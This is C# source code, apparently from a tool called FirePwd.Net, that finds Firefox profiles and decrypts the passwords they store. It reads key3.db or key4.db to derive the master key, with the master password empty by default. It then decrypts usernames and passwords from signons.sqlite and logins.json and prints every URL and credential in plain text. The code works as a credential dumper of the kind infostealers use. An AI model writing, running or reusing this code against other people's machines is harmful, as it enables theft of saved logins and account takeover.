public static int Main(string[] args) { string MasterPwd = string.Empty; byte[] privateKey = new byte[24]; bool loginsFound = false, signonsFound = false; string signonsFile = string.Empty, loginsFile = string.Empty;; string filePath = string.Empty; DBHelper dbh = new DBHelper(); Converts conv = new Converts(); // Read berkeleydb DataTable dt = new DataTable(); Asn1Der asn = new Asn1Der(); List <LoginFieldS> lp = new List <LoginFieldS>(); List <string> dirs = Directory.GetDirectories(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Mozilla\\Firefox\\Profiles")).ToList(); //Manage args for (int i = 0; i < args.Length; i++) { if (args[i].Equals("-p")) { MasterPwd = args[i + 1]; } if (args[i].Equals("-f")) { dirs.Clear(); dirs.Add(args[i + 1]); } if (args[i].Equals("-v")) { Verbose = true; } if (args[i].Equals("-h")) { Console.WriteLine("FirePwd.Net v0.1"); Console.WriteLine("Usage :"); Console.WriteLine("\t -p to specify Master Password"); Console.WriteLine("\t -v to activate verbose mode"); Console.WriteLine("\t -f to specify path for files key3.db and signons.sqlite"); return(0); } } foreach (string dir in dirs) { // Check if files exists string[] files = Directory.GetFiles(dir, "signons.sqlite"); if (files.Length > 0) { filePath = dir; signonsFile = files[0]; signonsFound = true; } // find logins.json file files = Directory.GetFiles(dir, "logins.json"); if (files.Length > 0) { filePath = dir; loginsFile = files[0]; loginsFound = true; } if (!loginsFound && !signonsFound) { Console.WriteLine("File signons & logins not found."); continue; } if (filePath == string.Empty) { Console.WriteLine("Mozilla not found."); continue; } if (Verbose) { Console.WriteLine("Check if exist key3.db or key3.db"); } // Check if files exists if (!File.Exists(Path.Combine(filePath, "key3.db"))) { privateKey = dbh.CheckKey4DB(dir, MasterPwd, Verbose); } else { privateKey = dbh.CheckKey3DB(dir, MasterPwd, Verbose); } if (privateKey == null || privateKey.Length == 0) { Console.WriteLine("Private key return null"); continue; } FFLogins ffLoginData; if (signonsFound) { if (Verbose) { Console.WriteLine("Fetch users fron signons file"); } using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite"))) { cnn.Open(); SQLiteCommand mycommand = new SQLiteCommand(cnn); mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;"; SQLiteDataReader reader = mycommand.ExecuteReader(); dt.Load(reader); } foreach (DataRow row in dt.Rows) { Asn1DerObject user = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString())); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString())); string hostname = row["hostname"].ToString(); string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", ""); string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""); lp.Add(new LoginFieldS { url = hostname, userName = username, password = password }); } } if (loginsFound) { if (Verbose) { Console.WriteLine("Fetch users fron logins file"); } using (StreamReader sr = new StreamReader(Path.Combine(filePath, "logins.json"))) { string json = sr.ReadToEnd(); ffLoginData = JsonConvert.DeserializeObject <FFLogins>(json); } foreach (LoginData loginData in ffLoginData.logins) { Asn1DerObject user = asn.Parse(Convert.FromBase64String(loginData.encryptedUsername)); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(loginData.encryptedPassword)); string hostname = loginData.hostname; string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", ""); string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""); lp.Add(new LoginFieldS { url = hostname, userName = username, password = password }); } } } foreach (var userInfo in lp) { Console.WriteLine("==================================================="); Console.WriteLine($"url:{userInfo.url}\nUsername: {userInfo.userName}\nPassword:{userInfo.password}"); Console.WriteLine("==================================================="); } Console.Read(); return(0); }
private static String Parse4Logins(string directory, string userName, string masterPassword = "") { Asn1Der asn = new Asn1Der(); byte[] item2 = new byte[] { }; byte[] item1 = new byte[] { }; byte[] a11 = new byte[] { }; byte[] a102 = new byte[] { }; string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'"; GetItemsFromQuery(directory, ref item1, ref item2, query); Console.WriteLine("Fetch data from key4.db file"); Asn1DerObject f800001 = asn.Parse(item2); MozillaPBE CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data); if (!decryptedPwdChk.StartsWith("password-check")) { Console.WriteLine("Master password is wrong !"); return(null); } query = "SELECT a11,a102 FROM nssPrivate"; GetItemsFromQuery(directory, ref a11, ref a102, query); var decodedA11 = asn.Parse(a11); var entrySalt = decodedA11.objects[0].objects[0].objects[1].objects[0].Data; var cipherT = decodedA11.objects[0].objects[1].Data; byte[] privateKey; try { privateKey = decrypt3DES(item1, masterPassword, entrySalt, cipherT); } catch { Console.WriteLine("[X] Could not retrieve private key."); return(null); } // decrypt username and password string loginsJsonPath = String.Format("{0}\\{1}", directory, "logins.json"); Login[] logins = null; try { logins = ParseLoginFile(loginsJsonPath); } catch { } if (logins.Length == 0) { Console.WriteLine("No logins discovered from logins.json"); return(null); } foreach (Login login in logins) { Asn1DerObject user = asn.Parse(Convert.FromBase64String(login.encryptedUsername)); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(login.encryptedPassword)); string hostname = login.hostname; string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); Console.WriteLine("--- FireFox Credential (User: {0}) ---", userName); Console.WriteLine("Hostname: {0}", hostname); Console.WriteLine("Username: {0}", Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "")); Console.WriteLine("Password: {0}", Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "")); Console.WriteLine(); } return(null); }